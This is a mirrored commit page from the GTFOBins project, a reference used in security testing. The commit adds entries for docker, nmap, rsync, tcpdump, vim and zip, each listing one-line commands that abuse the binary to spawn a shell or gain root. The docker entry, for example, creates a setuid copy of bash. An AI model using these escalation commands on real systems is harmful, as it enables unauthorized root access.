mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-24 13:59:17 +01:00
add new ways
This commit is contained in:
parent
6b73dcf283
commit
7219385a05
7
_gtfobins/docker.md
Normal file
7
_gtfobins/docker.md
Normal file
@ -0,0 +1,7 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: docker run -v /home/${USER}:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p
|
||||
sudo-enabled:
|
||||
- code: sudo docker run -v /home/${USER}:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p
|
||||
---
|
9
_gtfobins/nmap.md
Normal file
9
_gtfobins/nmap.md
Normal file
@ -0,0 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-non-interactive:
|
||||
- code: echo "os.execute('/bin/sh')" > /tmp/script.nse
|
||||
nmap --script=/tmp/script.nse
|
||||
sudo-enabled:
|
||||
- code: echo "os.execute('/bin/sh')" > /tmp/script.nse
|
||||
sudo nmap --script=/tmp/script.nse
|
||||
---
|
9
_gtfobins/rsync.md
Normal file
9
_gtfobins/rsync.md
Normal file
@ -0,0 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-non-interactive:
|
||||
- code: echo "whoami > /tmp/whoami" > /tmp/tmpfile
|
||||
rsync -e 'sh /tmp/tmpfile' /dev/null 127.0.0.1:/dev/null 2>/dev/null
|
||||
sudo-enabled:
|
||||
- code: echo "whoami > /tmp/whoami" > /tmp/tmpfile
|
||||
sudo rsync -e 'sh /tmp/tmpfile' /dev/null 127.0.0.1:/dev/null 2>/dev/null
|
||||
---
|
9
_gtfobins/tcpdump.md
Normal file
9
_gtfobins/tcpdump.md
Normal file
@ -0,0 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-non-interactive:
|
||||
- code: echo "whoami > /tmp/whoami" > /tmp/tmpfile
|
||||
tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z ./tmpfile -Z root
|
||||
sudo-enabled:
|
||||
- code: echo "whoami > /tmp/whoami" > /tmp/tmpfile
|
||||
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z ./tmpfile -Z root
|
||||
---
|
19
_gtfobins/vim.md
Normal file
19
_gtfobins/vim.md
Normal file
@ -0,0 +1,19 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: vim -c ':!/bin/sh'
|
||||
- code: |
|
||||
vim
|
||||
:set shell=/bin/sh
|
||||
:shell
|
||||
file-write:
|
||||
- code: |
|
||||
vim file_to_write
|
||||
w
|
||||
file-read:
|
||||
- code: vim file_to_read
|
||||
suid-enabled:
|
||||
- code: ./vim -c ':!/bin/sh -p'
|
||||
sudo-enabled:
|
||||
- code: sudo vim -c ':!/bin/sh'
|
||||
---
|
11
_gtfobins/zip.md
Normal file
11
_gtfobins/zip.md
Normal file
@ -0,0 +1,11 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: echo "/bin/sh" > /tmp/run.sh
|
||||
chmod +x /tmp/run.sh
|
||||
zip z.zip * -T -TT /tmp/run.sh
|
||||
sudo-enabled:
|
||||
- code: echo "/bin/sh" > /tmp/run.sh
|
||||
chmod +x /tmp/run.sh
|
||||
sudo zip z.zip * -T -TT /tmp/run.sh
|
||||
---
|
Loading…
Reference in New Issue
Block a user